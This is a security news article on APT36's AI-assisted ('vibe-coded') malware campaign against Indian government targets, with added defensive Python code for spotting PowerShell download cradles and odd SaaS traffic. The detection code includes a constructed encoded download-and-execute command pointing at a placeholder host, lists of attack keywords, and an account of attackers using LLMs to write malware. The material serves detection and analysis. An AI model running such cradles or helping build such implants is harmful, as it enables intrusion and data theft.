
The Pakistan-aligned threat actor known as Transparent Tribe (also tracked as APT36) has become the latest hacking group to use artificial intelligence (AI)-powered coding tools to build the implants it deploys against its targets.
According to new findings from Bitdefender, the campaign relies on producing “a large number of mediocre implants” in lesser-known programming languages such as Nim, Zig, and Crystal, and on trusted services such as Slack, Discord, Supabase, and Google Sheets for command-and-control (C2) so that the traffic blends in with legitimate use.
In a technical breakdown of the campaign, security researchers Radu Tudrica, Adrian Schipor, Victor Vrabie, Marius Baciu, and Martin Zugec wrote, “Rather than a breakthrough in technological sophistication, we see a shift toward an AI-assisted malware industrialization that allows attackers to flood target environments with single-use, multilingual binaries.”
The Romanian cybersecurity vendor characterizes the shift to vibe-coded malware (also known as vibeware) as distributed denial-of-detection (DDoD). Rather than using advanced techniques to evade detection, the approach floods the target environment with a large number of single-use binaries, each written in a different language and using a different communication protocol, so that indicators derived from any one sample are of little use against the next.
Large language models (LLMs) are what make this approach practical. They lower the barrier to entry and close the expertise gap by letting attackers generate functional code in unfamiliar languages, either from scratch or by porting the core logic of an existing tool from a more popular language.
The latest wave of attacks targets the Indian government and its embassies in several foreign countries, with APT36 using LinkedIn to identify high-value targets. To a lesser extent, the campaign also targeted the Afghan government and some private companies.
The infection chain can begin with a phishing email carrying a Windows shortcut (LNK) packaged inside a ZIP archive or ISO image. Alternatively, a PDF lure with a prominent “Download Document” button redirects the user to an attacker-controlled website that serves the same ZIP archive.
Regardless of the entry method, the LNK file launches PowerShell, which runs a script in memory that downloads and executes the main backdoor for post-compromise activity. That follow-on tooling includes well-known adversary simulation frameworks such as Cobalt Strike and Havoc, a hybrid approach that pairs the disposable AI-assisted implants with proven commodity frameworks for resilience.
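Whatever language the final implant is written in, the first stage above is the same every time: a shortcut from a ZIP or mounted ISO launches PowerShell, which stages the payload in memory. That makes the process-creation event the stable place to detect. The following is an added example, not code from Bitdefender or from the article, of a detection pass over constructed Sysmon Event ID 1-style process-creation events. The events, paths, and the example.invalid URL are constructed, and the indicator lists are an illustrative starting point rather than a complete rule.

```python
"""
Added example (not Bitdefender's or the article's code): a small detection pass
over constructed Sysmon Event ID 1-style process-creation events that flags the
LNK -> PowerShell in-memory download cradle described in the article.
All events, paths and the example.invalid URL below are constructed.
"""
import base64
import binascii
import re

# Command-line fragments that indicate in-memory execution or a download cradle.
CRADLE_PATTERNS = [
    r"\bIEX\b", r"Invoke-Expression", r"DownloadString", r"DownloadData",
    r"Net\.WebClient", r"Invoke-WebRequest", r"\biwr\b", r"Invoke-RestMethod",
    r"\birm\b", r"Start-BitsTransfer", r"FromBase64String",
]
# Launch switches used to hide the console and skip policy/profile checks.
EVASION_SWITCHES = [
    r"-w(?:indowstyle)?\s+hidden", r"-nop\b", r"-noprofile\b", r"-ep\s+bypass",
    r"-executionpolicy\s+bypass", r"-noni\b", r"-noninteractive\b",
]
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# A parent of explorer.exe is what a double-clicked shortcut (from a ZIP or mounted ISO) looks like.
USER_LAUNCH_PARENTS = {"explorer.exe"}
# -EncodedCommand (and its short forms) carries base64 of UTF-16LE script text.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand script, or '' if absent or not valid base64."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return ""
    return raw.decode("utf-16-le", errors="ignore")


def score_event(ev: dict) -> dict:
    """Return {'suspicious': bool, 'reasons': [...]} for one process-creation event."""
    reasons = []
    if basename(ev.get("Image", "")) not in POWERSHELL_IMAGES:
        return {"suspicious": False, "reasons": reasons}
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append("encoded command")
    # Inspect both the visible command line and the decoded payload.
    for pat in CRADLE_PATTERNS:
        if re.search(pat, cmd + " " + decoded, re.I):
            reasons.append("cradle: " + pat)
    for pat in EVASION_SWITCHES:
        if re.search(pat, cmd, re.I):
            reasons.append("evasion switch: " + pat)
    parent = basename(ev.get("ParentImage", ""))
    if parent in USER_LAUNCH_PARENTS:
        reasons.append("launched from " + parent)
    # Fire only on a cradle or encoded payload backed by at least one corroborating signal;
    # a plain interactive or scripted PowerShell session should stay quiet.
    has_payload = any(r.startswith(("cradle", "encoded")) for r in reasons)
    return {"suspicious": has_payload and len(reasons) >= 2, "reasons": reasons}


def _encode(script: str) -> str:
    """Produce a -EncodedCommand argument the way an attacker's LNK would carry it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [  # constructed telemetry
    {   # Double-clicked LNK: explorer.exe spawns hidden PowerShell with an encoded download cradle.
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc "
        + _encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"),
    },
    {   # Administrator running a local script from a console: must not fire.
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\Get-DiskReport.ps1",
    },
    {   # Not PowerShell at all: out of scope for this rule.
        "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "firefox.exe",
    },
]


def run_detection(events=SAMPLE_EVENTS):
    return [score_event(ev) for ev in events]


if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, run_detection()):
        print(verdict["suspicious"], basename(ev["Image"]), verdict["reasons"])
```

The point of decoding the -EncodedCommand argument before matching is that the cradle keywords are usually only visible in the decoded UTF-16LE script, not on the raw command line; the corroboration requirement (hidden window, no profile, explorer.exe as parent) is what keeps legitimate scripted administration out of the alert queue.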

Here are some of the other tools observed as part of the attack:
- Warcode is a custom shellcode loader written in Crystal that reflectively loads Havoc agents directly into memory.
- NimShellcodeLoader is an experimental counterpart to Warcode, written in Nim, used to deploy Cobalt Strike Beacons.
- CreepDropper is a .NET malware used to deliver and install additional payloads, including SHEETCREEP, a Go-based infostealer that uses the Microsoft Graph API for C2, and MAILCREEP, a C#-based backdoor that uses Google Sheets for C2. Both malware families were documented by Zscaler ThreatLabz in January 2026.
- SupaServ is a Rust-based backdoor whose primary communication channel is the Supabase platform, with Firebase as a fallback. Its code contains Unicode emojis, suggesting it was likely developed with AI assistance.
- LuminousStealer is a Rust-based infostealer, also believed to be vibe-coded, that uses Firebase and Google Drive to exfiltrate files matching specific extensions (.txt, .docx, .pdf, .png, .jpg, .xlsx, .pptx, .zip, .rar, .doc, and .xls).
- CrystalShell is a backdoor written in Crystal that targets Windows, Linux, and macOS and uses a hardcoded Discord channel ID for C2. It supports command execution and host information collection. One variant was found to use Slack for C2 instead.
- ZigShell is the Zig-language equivalent of CrystalShell and uses Slack as its primary C2 channel. It additionally supports file upload and download.
- CrystalFile is a simple command interpreter written in Crystal that continuously monitors ‘C:\Users\Public\AccountPictures\input.txt’ and executes its contents using ‘cmd.exe’.
- LuminousCookies is a specialized Rust-based injector that extracts cookies, passwords, and payment information from Chromium-based browsers by bypassing app-bound encryption.
- BackupSpy is a Rust-based utility that monitors high-value data on local file systems and external media.
- ZigLoader is a specialized loader written in Zig that decrypts and executes arbitrary shellcode in memory.
- Gate Sentinel Beacon is a customized build of the open source GateSentinel C2 framework.
“APT36’s move to Vibeware represents a technological regression,” Bitdefender said. “Although AI-assisted development increases sample volumes, the resulting tools are often unstable and full of logic errors. Attacker strategies have incorrectly targeted signature-based detection, which has long been supplanted by modern endpoint security.”
Bitdefender warned that the real threat posed by AI-assisted malware is the industrialization of attacks: threat actors can scale their operations quickly and with far less effort than before.
“We are witnessing the convergence of two trends that have been developing for some time: the adoption of exotic and niche programming languages, and the exploitation of trusted services to hide behind legitimate network traffic,” the researchers said. “This combination allows even mediocre code to achieve high operational success by overwhelming standard defensive telemetry.”
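Because every implant in this campaign is a fresh binary in a different language, per-sample hashes and signatures never catch up (the DDoD problem described earlier). What the samples share is the channel: a process that has no business talking to Slack, Discord, Supabase, Firebase, Google Sheets or the Microsoft Graph API is the signal that survives the language churn. The following added example, not Bitdefender's or the article's code, shows that pivot over constructed Sysmon Event ID 3-style network-connection events. The allowlist of expected client processes, the image paths and the hash placeholders are all assumptions constructed for the example.

```python
"""
Added example (not Bitdefender's or the article's code): triage of constructed
Sysmon Event ID 3-style network-connection events that pivots on destination
service and process provenance rather than on per-sample hashes.
The allowlist, image paths and hash placeholders are all constructed assumptions.
"""
from collections import defaultdict
from typing import Optional

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Trusted services named in the article, mapped to the processes expected to use them.
# ASSUMPTION: illustrative only; a real allowlist is built from the environment's own baseline.
EXPECTED_CLIENTS = {
    "slack.com":           BROWSERS | {"slack.exe"},
    "discord.com":         BROWSERS | {"discord.exe"},
    "supabase.co":         BROWSERS,              # project APIs live at <ref>.supabase.co
    "firebaseio.com":      BROWSERS,              # Firebase Realtime Database hosts
    "googleapis.com":      BROWSERS,              # Sheets and Drive APIs
    "graph.microsoft.com": BROWSERS | {"outlook.exe", "ms-teams.exe", "onedrive.exe"},
}


def basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def matching_service(host: str) -> Optional[str]:
    """Longest allowlisted domain that `host` equals or is a subdomain of, else None."""
    host = host.lower().rstrip(".")
    hits = [d for d in EXPECTED_CLIENTS if host == d or host.endswith("." + d)]
    return max(hits, key=len) if hits else None


def flag_unexpected_saas_clients(events):
    """Keep connections to a trusted service made by a process not expected to use it."""
    flagged = []
    for ev in events:
        svc = matching_service(ev["DestinationHostname"])
        if svc is not None and basename(ev["Image"]) not in EXPECTED_CLIENTS[svc]:
            flagged.append({"Image": basename(ev["Image"]), "Hash": ev["Hash"], "Service": svc})
    return flagged


def distinct_hashes(flagged):
    """Every entry here would need its own hash IoC; with single-use binaries that list never ends."""
    return {f["Hash"] for f in flagged}


def pivot_by_service(flagged):
    """Collapse the same activity by channel: one rule per service covers every language and binary."""
    buckets = defaultdict(set)
    for f in flagged:
        buckets[f["Service"]].add(f["Image"])
    return {svc: sorted(imgs) for svc, imgs in buckets.items()}


SAMPLE_EVENTS = [  # constructed: one disposable binary per language/channel, as the article describes
    {"Image": r"C:\Users\Public\zs_update.exe", "Hash": "h-zig-01",     "DestinationHostname": "slack.com"},
    {"Image": r"C:\Users\Public\cr_helper.exe", "Hash": "h-crystal-02", "DestinationHostname": "discord.com"},
    {"Image": r"C:\ProgramData\sync\supa.exe",  "Hash": "h-rust-03",    "DestinationHostname": "abcdefgh.supabase.co"},
    {"Image": r"C:\ProgramData\sync\supa.exe",  "Hash": "h-rust-03",    "DestinationHostname": "demo-proj.firebaseio.com"},
    {"Image": r"C:\Users\Public\rep_a.exe",     "Hash": "h-go-04",      "DestinationHostname": "graph.microsoft.com"},
    {"Image": r"C:\Users\Public\rep_b.exe",     "Hash": "h-csharp-05",  "DestinationHostname": "sheets.googleapis.com"},
    # Benign: the official Slack client and a browser using Google Sheets.
    {"Image": r"C:\Users\alice\AppData\Local\slack\slack.exe", "Hash": "h-slack", "DestinationHostname": "slack.com"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "Hash": "h-chrome", "DestinationHostname": "sheets.googleapis.com"},
    # Not a trusted-service destination: outside this rule's scope.
    {"Image": r"C:\Users\Public\zs_update.exe", "Hash": "h-zig-01", "DestinationHostname": "time.windows.com"},
]

if __name__ == "__main__":
    flagged = flag_unexpected_saas_clients(SAMPLE_EVENTS)
    print(len(distinct_hashes(flagged)), "distinct hashes would each need an IoC")
    for svc, imgs in pivot_by_service(flagged).items():
        print(svc, "<-", ", ".join(imgs))
```

On the constructed data, five distinct binaries collapse to six service buckets that a single provenance rule already covers, which is the practical answer to the volume problem. Two caveats for real use: the allowlist must come from the fleet's own baseline rather than a guess, and a bare filename check is defeated by a binary that names itself chrome.exe, so the image's signature and install path should back the basename before an event is treated as benign.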
